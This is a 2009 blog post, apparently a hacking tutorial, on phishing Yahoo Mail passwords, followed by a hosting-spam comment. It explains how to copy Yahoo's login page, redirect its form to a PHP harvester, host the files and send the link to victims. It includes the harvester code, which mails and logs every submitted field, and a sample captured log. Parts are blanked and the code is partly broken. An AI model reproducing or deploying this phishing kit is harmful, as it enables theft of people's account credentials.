Phishing Yahoo Special

Thursday, September 17, 2009

Obviously, there are more than 5 tuts about phishing, you can find password .
Well, our topic is phishing and getting passwords of our victims.

note : I will try to explain clearly and a long text to make noobs understand

first, sign up for an account in or or or or

I prefer

after signing up, we will visit yahoo or anything else, remember that our tut is about phishing for yahoo but that can be used for everything,example :,aim,payjerks...etc

Visit "yahoo" and then "mail" then press "view" in the toolbar and then press "source"
search for "action=" without quotes
you will find a link like" autocomplete="off" name="login_form" onsubmit="return hash2(this)">
replace this with 
 then save as "index.htm" without quotes

then, copy the text below and save it as whatever.php

Coded By : Hangaw_HawlerY
Email: ,
All Right Reserved

header ('Location: ');

$posts        = '';
foreach($_POST as $k => $v){
    $posts .= '$_POST['.$k.'] = '.$v."\n";

$posts       .= "---------------------------------------------------\n";
$emailto    = '';
$subject    = $_SERVER['HTTP_HOST']."-".$_SEREVER['SERVER_NAME'];
$from        = "From: Password <>";
$body        = '

@mail($emailto, $subject, $body, $from);
$handle = @fopen("h4kurd.txt", "a+");
@fwrite($handle, $posts);
 replace your email here
$emailto    = '';

after saving the file as whatever.php , then we will upload both of the files into our account.
in our account press "new directory" and put both the files into a folder and save it as something, example : "whatever" , so it will be:-
 then send the link to someone, He will see that it looks like yahoo then he will write user and pw, finally the information will come to you.

how to find email and password?
in the folder that contains index.htm and whatever.php , we see a file is created and called as whatever.txt
click on whatever.txt
we will see something like that
$_POST[_tries] = 1
$_POST[_src] =
$_POST[_md5] =
$_POST[_hash] =
$_POST[_js] =
$_POST[_last] =
$_POST[promo] =
$_POST[_intl] = us
$_POST[_bypass] =
$_POST[_partner] =
$_POST[_u] = 6ga5db1542pin
$_POST[_v] = 0
$_POST[_challenge] = 6EdnwZby.sK25VugWsloCQjUiO8H
$_POST[_yplus] =
$_POST[_emailCode] =
$_POST[pkg] =
$_POST[stepid] =
$_POST[_ev] =
$_POST[hasMsgr] = 0
$_POST[_chkP] = Y
$_POST[_done] =
$_POST[_pd] = _ver=0&c=&ivt=&sg=
$_POST[login] =
$_POST[passwd] = whatever
$_POST[_save] = Sign In
Well I hope you got it


Blogger said...

DreamHost is definitely one of the best hosting company for any hosting plans you require.